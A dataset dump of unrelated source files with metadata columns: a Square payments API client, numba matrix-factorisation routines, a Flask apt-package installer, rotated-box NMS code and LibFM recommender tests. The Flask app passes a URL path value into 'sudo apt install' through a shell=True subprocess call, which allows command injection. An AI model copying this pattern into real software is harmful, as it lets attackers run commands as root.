:param str sort_order: The order in which results are listed in the response (`ASC` for oldest first, `DESC` for newest first). Default value: `DESC`
:param str cursor: A pagination cursor returned by a previous call to this endpoint. Provide this to retrieve the next set of results for your original query. See [Paginating results](#paginatingresults) for more information.
:return: ListRefundsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'begin_time', 'end_time', 'sort_order', 'cursor']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_refunds" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `list_refunds`")
resource_path = '/v2/locations/{location_id}/refunds'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
query_params = {}
if 'begin_time' in params and params['begin_time'] is not None:
query_params['begin_time'] = params['begin_time']
if 'end_time' in params and params['end_time'] is not None:
query_params['end_time'] = params['end_time']
if 'sort_order' in params and params['sort_order'] is not None:
query_params['sort_order'] = params['sort_order']
if 'cursor' in params and params['cursor'] is not None:
query_params['cursor'] = params['cursor']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListRefundsResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
def list_transactions(self, location_id, **kwargs):
"""
ListTransactions
Lists transactions for a particular location. Transactions include payment information from sales and exchanges and refund information from returns and exchanges. Max results per [page](#paginatingresults): 50
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_transactions(location_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: The ID of the location to list transactions for. (required)
:param str begin_time: The beginning of the requested reporting period, in RFC 3339 format. See [Date ranges](#dateranges) for details on date inclusivity/exclusivity. Default value: The current time minus one year.
:param str end_time: The end of the requested reporting period, in RFC 3339 format. See [Date ranges](#dateranges) for details on date inclusivity/exclusivity. Default value: The current time.
:param str sort_order: The order in which results are listed in the response (`ASC` for oldest first, `DESC` for newest first). Default value: `DESC`
:param str cursor: A pagination cursor returned by a previous call to this endpoint. Provide this to retrieve the next set of results for your original query. See [Paginating results](#paginatingresults) for more information.
:return: ListTransactionsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'begin_time', 'end_time', 'sort_order', 'cursor']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_transactions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `list_transactions`")
resource_path = '/v2/locations/{location_id}/transactions'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
query_params = {}
if 'begin_time' in params and params['begin_time'] is not None:
query_params['begin_time'] = params['begin_time']
if 'end_time' in params and params['end_time'] is not None:
query_params['end_time'] = params['end_time']
if 'sort_order' in params and params['sort_order'] is not None:
query_params['sort_order'] = params['sort_order']
if 'cursor' in params and params['cursor'] is not None:
query_params['cursor'] = params['cursor']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListTransactionsResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
def retrieve_transaction(self, location_id, transaction_id, **kwargs):
"""
RetrieveTransaction
Retrieves details for a single transaction.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.retrieve_transaction(location_id, transaction_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: The ID of the transaction's associated location. (required)
:param str transaction_id: The ID of the transaction to retrieve. (required)
:return: RetrieveTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'transaction_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_transaction" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `retrieve_transaction`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params) or (params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `retrieve_transaction`")
resource_path = '/v2/locations/{location_id}/transactions/{transaction_id}'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
if 'transaction_id' in params:
path_params['transaction_id'] = params['transaction_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RetrieveTransactionResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
def void_transaction(self, location_id, transaction_id, **kwargs):
"""
VoidTransaction
Cancels a transaction that was created with the [Charge](#endpoint-charge) endpoint with a `delay_capture` value of `true`. See [Delayed capture transactions](/articles/delayed-capture-transactions/) for more information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.void_transaction(location_id, transaction_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: (required)
:param str transaction_id: (required)
:return: VoidTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'transaction_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method void_transaction" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `void_transaction`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params) or (params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `void_transaction`")
resource_path = '/v2/locations/{location_id}/transactions/{transaction_id}/void'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
if 'transaction_id' in params:
path_params['transaction_id'] = params['transaction_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VoidTransactionResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
| 45.944954
| 941
| 0.593118
| 3,215
| 30,048
| 5.380093
| 0.107621
| 0.048563
| 0.0259
| 0.022663
| 0.822859
| 0.814881
| 0.810025
| 0.800833
| 0.798
| 0.781234
| 0
| 0.002761
| 0.32498
| 30,048
| 653
| 942
| 46.015314
| 0.850022
| 0.35633
| 0
| 0.809524
| 0
| 0
| 0.213854
| 0.030135
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.020833
| 0
| 0.068452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c147d0a00169e651b6eebf456362b088bd44844
| 4,281
|
py
|
Python
|
aarms/models/_symals.py
|
eldrin/aarms
|
bdd5455ac8dcfc1fe91a12fdd132b74e6c37609d
|
[
"MIT"
] | null | null | null |
aarms/models/_symals.py
|
eldrin/aarms
|
bdd5455ac8dcfc1fe91a12fdd132b74e6c37609d
|
[
"MIT"
] | 3
|
2020-11-05T08:44:46.000Z
|
2020-11-10T17:25:15.000Z
|
aarms/models/_symals.py
|
eldrin/aarms
|
bdd5455ac8dcfc1fe91a12fdd132b74e6c37609d
|
[
"MIT"
] | null | null | null |
from scipy import sparse as sp
import numpy as np
import numba as nb
from ._als import (fetch,
partial_wals_npy, partial_wals_cg_npy,
partial_wals, partial_wals_cg)
def update_entity_npy(
data_x, indices_x, indptr_x,
data_g, indices_g, indptr_g,
data_s, indices_s, indptr_s,
U, P, W_a, W_s, A,
lmbda_g, lmbda_a, lmbda_s, lmbda,
is_smp_exp=False, is_smp_exp_g=False,
solver="cg", cg_steps=5, eps=1e-20,
):
"""
"""
# setup some vars and pre-computation
N = U.shape[0]
U_tmp = U.copy()
UU = U.T @ U
PP = P.T @ P
# prepare some dummies for Y term
val_y = np.array([0], dtype=data_x.dtype)
ind_y = np.array([0], dtype=indices_x.dtype)
_ = np.array([[0]], dtype=U.dtype) # dummy
# randomize order
rnd_idx = np.random.permutation(N)
# run!
for n in range(N):
u = rnd_idx[n]
val_x, ind_x, skip_x = fetch(u, data_x, indices_x, indptr_x, 1)
val_g, ind_g, skip_g = fetch(u, data_g, indices_g, indptr_g, lmbda_g)
val_s, ind_s, skip_s = fetch(u, data_s, indices_s, indptr_s, lmbda_s)
if skip_x * skip_g * skip_s == 1:
continue
if solver == "lu":
partial_wals_npy(
u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
-1, lmbda_g, lmbda_a, lmbda_s, lmbda,
is_smp_exp, False, is_smp_exp_g
)
elif solver == "cg":
partial_wals_cg_npy(
u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
-1, lmbda_g, lmbda_a, lmbda_s, lmbda,
is_smp_exp, False, is_smp_exp_g,
cg_steps=cg_steps, eps=eps,
)
@nb.njit(
[
nb.void(
nb.f4[::1], nb.i4[::1], nb.i4[::1],
nb.f4[::1], nb.i4[::1], nb.i4[::1],
nb.f4[::1], nb.i4[::1], nb.i4[::1],
nb.f4[:,::1], nb.f4[:,::1], nb.f4[:,::1], nb.f4[:,::1], nb.f4[:,::1],
nb.f4, nb.f4, nb.f4, nb.f4, nb.b1, nb.b1,
nb.types.unicode_type, nb.i8, nb.f8,
),
nb.void(
nb.f8[::1], nb.i4[::1], nb.i4[::1],
nb.f8[::1], nb.i4[::1], nb.i4[::1],
nb.f8[::1], nb.i4[::1], nb.i4[::1],
nb.f8[:,::1], nb.f8[:,::1], nb.f8[:,::1], nb.f8[:,::1], nb.f8[:,::1],
nb.f8, nb.f8, nb.f8, nb.f8, nb.b1, nb.b1,
nb.types.unicode_type, nb.i8, nb.f8,
),
],
nogil=True, parallel=True, cache=True,
)
def update_entity(
data_x, indices_x, indptr_x,
data_g, indices_g, indptr_g,
data_s, indices_s, indptr_s,
U, P, W_a, W_s, A,
lmbda_g, lmbda_a, lmbda_s, lmbda,
is_smp_exp=False, is_smp_exp_g=False,
solver="cg", cg_steps=5, eps=1e-20,
):
"""
"""
# setup some vars and pre-computation
N = U.shape[0]
U_tmp = U.copy()
UU = U.T @ U
PP = P.T @ P
# prepare some dummies for Y term
val_y = np.array([0], dtype=data_x.dtype)
ind_y = np.array([0], dtype=np.int32)
_ = np.array([[0]], dtype=U.dtype) # dummy
# randomize order
rnd_idx = np.random.permutation(N)
# run!
for n in nb.prange(N):
u = rnd_idx[n]
val_x, ind_x, skip_x = fetch(u, data_x, indices_x, indptr_x, 1)
val_g, ind_g, skip_g = fetch(u, data_g, indices_g, indptr_g, lmbda_g)
val_s, ind_s, skip_s = fetch(u, data_s, indices_s, indptr_s, lmbda_s)
if skip_x * skip_g * skip_s == 1:
continue
if solver == "lu":
partial_wals(
u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
-1, lmbda_g, lmbda_a, lmbda_s, lmbda,
is_smp_exp, False, is_smp_exp_g
)
elif solver == "cg":
partial_wals_cg(
u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
-1, lmbda_g, lmbda_a, lmbda_s, lmbda,
is_smp_exp, False, is_smp_exp_g,
cg_steps=cg_steps, eps=eps,
)
| 32.18797
| 81
| 0.517636
| 737
| 4,281
| 2.720488
| 0.128901
| 0.041895
| 0.04788
| 0.03591
| 0.879801
| 0.879801
| 0.879801
| 0.86783
| 0.86783
| 0.86783
| 0
| 0.033992
| 0.326559
| 4,281
| 132
| 82
| 32.431818
| 0.661464
| 0.044149
| 0
| 0.72381
| 0
| 0
| 0.002956
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019048
| false
| 0
| 0.038095
| 0
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c3d86aa6a15502abf3071dc0b96b76ad424eebf
| 5,172
|
py
|
Python
|
IXGraphine/dev/web_app/app/home/views.py
|
ix-os/IXOS-utilities-and-extras
|
0ca421e7c387dd2ce829476d4a046e0ac4110e09
|
[
"Apache-2.0"
] | null | null | null |
IXGraphine/dev/web_app/app/home/views.py
|
ix-os/IXOS-utilities-and-extras
|
0ca421e7c387dd2ce829476d4a046e0ac4110e09
|
[
"Apache-2.0"
] | 2
|
2021-10-12T22:46:45.000Z
|
2022-03-25T19:09:53.000Z
|
dev/web_app/app/home/views.py
|
HUSKI3/IXGraphine
|
31bdb22e9e2a6880586eedd09591a62d7ce9aaed
|
[
"Apache-2.0"
] | null | null | null |
from flask import render_template, session, request
from . import home
import os
import subprocess
from wtforms import Form, StringField, SelectField
@home.route('/')
def homepage():
"""
Render the homepage template on the / route
"""
#os.system('apt-cache search crypto')
tag = 'crypto'
out = subprocess.Popen(['apt-cache', 'search', 'crypto'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
#print(stdout)
col=len(str(stdout).replace('\\n', '\n').split(str("\n")))
#print(col)
crypto=str(stdout).replace('\\n', '\n').split(str("\n"))
if request.method == "POST":
searchitem = request.form["appname"]
session['appname'] = searchitem
out = subprocess.Popen(['apt-cache', 'search', 'crypto'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
#print(stdout)
col=len(str(stdout).replace('\\n', '\n').split(str("\n")))
#print(col)
crypto=str(stdout).replace('\\n', '\n').split(str("\n"))
return render_template('page/home/index.html',tag=tag,crypto=crypto,col=col, title="Search Results")
return render_template('page/home/index.html',tag=tag,crypto=crypto,col=col, title="Home Page")
@home.route('install/<tag>/<appid>')
def install(tag,appid):
print("Installing...")
cmd = "(sudo apt install "+appid+" -y) | zenity --text-info"
result = subprocess.check_output(cmd, shell=True)
result=str(result).split(" ")
"""
Render the app page for the appid which isnt an id but an index of the list because im dumb but yeah
"""
print("Install appid:",appid)
print("Grabbing application list...")
out = subprocess.Popen(['apt-cache', 'search', str(tag)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
col=len(str(stdout).replace('\\n', '\n').split(str("\n")))
crypto=str(stdout).replace('\\n', '\n').split(str("\n"))
"""
This is hella inffectient and may break if a new application with the tag was added, update this upon v0.30
"""
print("Indexing...")
appname = [s for s in crypto if str(appid.split(" ")[0]) in s]
index = crypto.index(str(appname[0]))
print("Got index: ",index)
print("Building version data...")
out = subprocess.Popen(['apt-cache','policy', str(appid.split(" ")[0])],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
data=str(stdout).replace('\\n', '\n').split(str("\n"))
#print(data)
version = data
cmd = str('apt show -a '+appid.split(" ")[0])
out = subprocess.Popen(cmd.split(" "),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
data=str(stdout).replace('\\n', '\n').split(str("\n"))
#print(data)
data.pop(0)
sdata = data
data = [s for s in data if "Description:" in s]
size = [v for v in sdata if "Installed-Size:" in v]
return render_template('page/apps/app_page.html',size=size,data=data[0],version=version,appid=appid,index=index, title=str(appid))
@home.route('appinstall/<tag>/<appid>')
def appinstall(tag,appid):
"""
Render the app page for the appid which isnt an id but an index of the list because im dumb but yeah
"""
print("Install appid:",appid)
print("Grabbing application list...")
out = subprocess.Popen(['apt-cache', 'search', str(tag)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
col=len(str(stdout).replace('\\n', '\n').split(str("\n")))
crypto=str(stdout).replace('\\n', '\n').split(str("\n"))
"""
This is hella inffectient and may break if a new application with the tag was added, update this upon v0.30
"""
print("Indexing...")
appname = [s for s in crypto if str(appid.split(" ")[0]) in s]
index = crypto.index(str(appname[0]))
print("Got index: ",index)
print("Building version data...")
out = subprocess.Popen(['apt-cache','policy', str(appid.split(" ")[0])],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
data=str(stdout).replace('\\n', '\n').split(str("\n"))
#print(data)
version = data
cmd = str('apt show -a '+appid.split(" ")[0])
out = subprocess.Popen(cmd.split(" "),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = out.communicate()
data=str(stdout).replace('\\n', '\n').split(str("\n"))
#print(data)
data.pop(0)
sdata = data
data = [s for s in data if "Description:" in s]
size = [v for v in sdata if "Installed-Size:" in v]
return render_template('page/apps/app_page.html',size=size,tag=tag,data=data[0],version=version,appid=appid,index=index, title=str(appid))
@home.route('/dashboard')
def dashboard():
"""
Render the dashboard template on the /dashboard route
"""
return render_template('page/home/dashboard.html', title="Dashboard")
| 40.40625
| 142
| 0.619103
| 690
| 5,172
| 4.627536
| 0.163768
| 0.033824
| 0.060132
| 0.06389
| 0.812402
| 0.803633
| 0.803633
| 0.803633
| 0.803633
| 0.803633
| 0
| 0.004356
| 0.201083
| 5,172
| 127
| 143
| 40.724409
| 0.768393
| 0.062838
| 0
| 0.729167
| 0
| 0
| 0.164071
| 0.025954
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.052083
| 0
| 0.145833
| 0.114583
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c6c68304a1eea43917f9e3a907434b4aa9382a3
| 5,055
|
py
|
Python
|
mmdet/core/post_processing/rbbox_nms.py
|
GuoBo98/ShipDet
|
2979c39c5a56be3b99ba77833cfe556a8a0fc97e
|
[
"Apache-2.0"
] | null | null | null |
mmdet/core/post_processing/rbbox_nms.py
|
GuoBo98/ShipDet
|
2979c39c5a56be3b99ba77833cfe556a8a0fc97e
|
[
"Apache-2.0"
] | null | null | null |
mmdet/core/post_processing/rbbox_nms.py
|
GuoBo98/ShipDet
|
2979c39c5a56be3b99ba77833cfe556a8a0fc97e
|
[
"Apache-2.0"
] | null | null | null |
import torch
from mmdet.ops.nms.rnms_wrapper import py_cpu_nms_poly_fast
from mmdet.ops.nms import rnms_wrapper
from mmdet.ops.poly_nms import poly_nms_wrapper
from mmdet.core import RotBox2Polys, RotBox2Polys_torch
import time
# TODO: refator the code
# TODO: debug for testing cancel the nms
DEBUG = False
def multiclass_nms_rbbox(multi_bboxes,
multi_scores,
score_thr,
nms_cfg,
max_num=-1,
score_factors=None):
"""
NMS for multi-class bboxes.
:param multi_bboxes:
:param multi_scores:
:param score_thr:
:param nms_cfg:
:param max_num:
:param score_factors:
:return:
"""
#TODO:chech size
num_classes = multi_scores.size(1) - 1
bboxes, labels = [], []
nms_cfg_ = nms_cfg.copy()
# nms_type = nms_cfg_.pop('type', 'nms')
# nms_op = py_cpu_nms_poly_fast
nms_type = nms_cfg_.pop('type', 'nms')
# TODO: refactor it
if nms_type == 'poly_nms':
nms_op = getattr(poly_nms_wrapper, nms_type)
else:
nms_op = getattr(rnms_wrapper, nms_type)
for i in range(num_classes):
cls_inds = multi_scores[:, i] > score_thr
if not cls_inds.any():
continue
# get bboxes and scores of this class
if multi_bboxes.shape[1] == 5:
_bboxes = multi_bboxes[cls_inds, :]
else:
#TODO:check this
# import pdb
# pdb.set_trace()
_bboxes = multi_bboxes[cls_inds, i * 5: (i + 1) * 5]
_bboxes = torch.from_numpy(RotBox2Polys(_bboxes.cpu().numpy())).to(multi_scores.device)
# _bboxes = RotBox2Polys_torch(_bboxes)
# _bboxes = RotBox2Polys_torch(_bboxes.cpu()).to(multi_scores.device)
_scores = multi_scores[cls_inds, i]
if score_factors is not None:
_scores *= score_factors[cls_inds]
cls_dets = torch.cat([_bboxes, _scores[:, None]], dim=1)
# TODO: figure out the nms_cfg
if not DEBUG:
# start = time.clock()
cls_dets, _ = nms_op(cls_dets, **nms_cfg_)
# elapsed = (time.clock() - start)
# print("Time used:", elapsed)
# import pdb
# pdb.set_trace()
#TODO:check this
cls_labels = multi_bboxes.new_full(
(cls_dets.shape[0], ), i, dtype=torch.long)
bboxes.append(cls_dets)
labels.append(cls_labels)
if len(bboxes) > 0:
bboxes = torch.cat(bboxes)
labels = torch.cat(labels)
if bboxes.shape[0] > max_num:
_, inds = bboxes[:, -1].sort(descending=True)
inds = inds[:max_num]
bboxes = bboxes[inds]
labels = labels[inds]
else:
bboxes = multi_bboxes.new_zeros((0, 9))
labels = multi_bboxes.new_zeros((0, ), dtype=torch.long)
return bboxes, labels
def Pesudomulticlass_nms_rbbox(multi_bboxes,
multi_scores,
score_thr,
# nms_cfg,
max_num=-1,
score_factors=None):
"""
NMS for multi-class bboxes.
:param multi_bboxes:
:param multi_scores:
:param score_thr:
:param nms_cfg:
:param max_num:
:param score_factors:
:return:
"""
num_classes = multi_scores.shape[1]
bboxes, labels = [], []
# nms_cfg_ = nms_cfg.copy()
# nms_type = nms_cfg_.pop('type', 'nms')
# nms_op = py_cpu_nms_poly_fast
# nms_type = nms_cfg_.pop('type', 'nms')
# nms_op = getattr(rnms_wrapper, nms_type)
for i in range(1, num_classes):
cls_inds = multi_scores[:, i] > score_thr
if not cls_inds.any():
continue
# get bboxes and scores of this class
if multi_bboxes.shape[1] == 5:
_bboxes = multi_bboxes[cls_inds, :]
else:
_bboxes = multi_bboxes[cls_inds, i * 5: (i + 1) * 5]
_bboxes = torch.from_numpy(RotBox2Polys(_bboxes.cpu().numpy())).to(multi_scores.device)
_scores = multi_scores[cls_inds, i]
if score_factors is not None:
_scores *= score_factors[cls_inds]
cls_dets = torch.cat([_bboxes, _scores[:, None]], dim=1)
# TODO: figure out the nms_cfg
# if not DEBUG:
# cls_dets, _ = nms_op(cls_dets, **nms_cfg_)
# import pdb
# pdb.set_trace()
cls_labels = multi_bboxes.new_full(
(cls_dets.shape[0], ), i - 1, dtype=torch.long)
bboxes.append(cls_dets)
labels.append(cls_labels)
if bboxes:
bboxes = torch.cat(bboxes)
labels = torch.cat(labels)
if bboxes.shape[0] > max_num:
_, inds = bboxes[:, -1].sort(descending=True)
inds = inds[:max_num]
bboxes = bboxes[inds]
labels = labels[inds]
else:
bboxes = multi_bboxes.new_zeros((0, 9))
labels = multi_bboxes.new_zeros((0, ), dtype=torch.long)
return bboxes, labels
| 32.197452
| 95
| 0.573689
| 642
| 5,055
| 4.23053
| 0.154206
| 0.064801
| 0.037555
| 0.019146
| 0.795655
| 0.767673
| 0.767673
| 0.767673
| 0.749264
| 0.749264
| 0
| 0.010995
| 0.31632
| 5,055
| 156
| 96
| 32.403846
| 0.774884
| 0.225717
| 0
| 0.715909
| 0
| 0
| 0.003961
| 0
| 0
| 0
| 0
| 0.019231
| 0
| 1
| 0.022727
| false
| 0
| 0.068182
| 0
| 0.113636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c9df60c5585d70441032d36c1683499595c330e
| 3,850
|
py
|
Python
|
tests/test_libfm.py
|
lematt1991/RecLab
|
7ba212ac2ae346fb6dfeec232eef652d7f26e193
|
[
"MIT"
] | 51
|
2020-09-17T08:51:42.000Z
|
2022-03-26T20:44:48.000Z
|
tests/test_libfm.py
|
kiminh/RecLab
|
7fd29d1c780e91910008a322b04e1b1149a203c8
|
[
"MIT"
] | 25
|
2020-09-04T00:12:44.000Z
|
2021-10-05T02:21:58.000Z
|
tests/test_libfm.py
|
kiminh/RecLab
|
7fd29d1c780e91910008a322b04e1b1149a203c8
|
[
"MIT"
] | 6
|
2020-11-30T03:34:25.000Z
|
2022-02-08T18:27:48.000Z
|
"""Tests for the LibFM recommender."""
from reclab.recommenders import LibFM
from . import utils
def test_sgd_predict():
"""Test that LibFM trained with SGD predicts well and that it gets better with more data."""
recommender = LibFM(num_user_features=0,
num_item_features=0,
num_rating_features=0,
max_num_users=utils.NUM_USERS_ML100K,
max_num_items=utils.NUM_ITEMS_ML100K,
method='sgd',
learning_rate=0.003,
num_two_way_factors=8,
bias_reg=0.04,
one_way_reg=0.04,
two_way_reg=0.04,
num_iter=128,
seed=0)
utils.test_predict_ml100k(recommender, rmse_threshold=1.1)
def test_sgd_recommend():
"""Test that LibFM trained with SGD will recommend reasonable items."""
recommender = LibFM(num_user_features=0,
num_item_features=0,
num_rating_features=0,
max_num_users=utils.NUM_USERS_SIMPLE,
max_num_items=utils.NUM_ITEMS_SIMPLE,
method='sgd',
learning_rate=0.01,
num_two_way_factors=8,
num_iter=128,
seed=0)
utils.test_recommend_simple(recommender)
def test_mcmc_predict():
"""Test that LibFM trained with MCMC predicts well and that it gets better with more data."""
recommender = LibFM(num_user_features=0,
num_item_features=0,
num_rating_features=0,
max_num_users=utils.NUM_USERS_ML100K,
max_num_items=utils.NUM_ITEMS_ML100K,
method='mcmc',
num_two_way_factors=8,
num_iter=128,
seed=0)
utils.test_predict_ml100k(recommender, rmse_threshold=1.1)
def test_mcmc_recommend():
"""Test that LibFM trained with MCMC will recommend reasonable items."""
recommender = LibFM(num_user_features=0,
num_item_features=0,
num_rating_features=0,
max_num_users=utils.NUM_USERS_SIMPLE,
max_num_items=utils.NUM_ITEMS_SIMPLE,
method='mcmc',
num_two_way_factors=8,
num_iter=128,
seed=0)
utils.test_recommend_simple(recommender)
def test_als_predict():
"""Test that LibFM trained with ALS predicts well and that it gets better with more data."""
recommender = LibFM(num_user_features=0,
num_item_features=0,
num_rating_features=0,
max_num_users=utils.NUM_USERS_ML100K,
max_num_items=utils.NUM_ITEMS_ML100K,
method='als',
num_two_way_factors=8,
reg=0.02,
num_iter=128,
seed=0)
utils.test_predict_ml100k(recommender, rmse_threshold=1.4)
def test_als_recommend():
"""Test that LibFM trained with ALS will recommend reasonable items."""
recommender = LibFM(num_user_features=0,
num_item_features=0,
num_rating_features=0,
max_num_users=utils.NUM_USERS_SIMPLE,
max_num_items=utils.NUM_ITEMS_SIMPLE,
method='als',
num_two_way_factors=8,
num_iter=128,
seed=0)
utils.test_recommend_simple(recommender)
| 40.957447
| 97
| 0.526753
| 422
| 3,850
| 4.469194
| 0.146919
| 0.085896
| 0.076352
| 0.063627
| 0.917815
| 0.891835
| 0.779427
| 0.767232
| 0.767232
| 0.767232
| 0
| 0.043745
| 0.406234
| 3,850
| 93
| 98
| 41.397849
| 0.781277
| 0.128052
| 0
| 0.797297
| 0
| 0
| 0.006022
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
